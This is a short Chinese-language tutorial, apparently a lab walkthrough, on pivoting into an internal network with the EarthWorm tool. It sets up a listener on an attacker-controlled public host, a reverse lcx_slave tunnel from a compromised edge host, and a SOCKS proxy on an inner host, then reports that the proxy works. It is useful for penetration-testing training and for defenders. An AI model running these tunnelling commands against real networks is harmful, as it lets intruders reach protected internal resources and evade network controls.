1.获得目标网络内两台主机 A、B 的权限,情况描述如下:
A 主机: 目标网络的边界主机,无公网 IP,无法访问特定资源。
B 主机: 目标网络内部主机,可访问特定资源,却无法回连公网。
A 主机可直连 B 主机
2.一台可控公网IP主机(kali)执行命令。
./ew -s lcx_listen -l 1080 -e 8888// 在 1.1.1.1 公网主机添加转接隧道,将 1080 收到的代理请求
// 转交给反连 8888 端口的主机
3.可控内网主机A(win7)执行命令。注意这里需要修改IP,1.1.1.1为kali的IP,2.2.2.3为windows server 2016的IP(此处的IP与win7同网段)。
./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999// 在 2.2.2.2 上,通过工具的 lcx_slave 方式,打通1.1.1.1:8888 和 2.2.2.3:9999 之间的通讯隧道
4.可访问指定资源的主机B(windows server 2016)执行命令。
./ew -s ssocksd -l 9999// 在 2.2.2.3 主机上利用 ssocksd 方式启动 9999 端口的 socks 代理
5.测试连通性。
代理连通性测试成功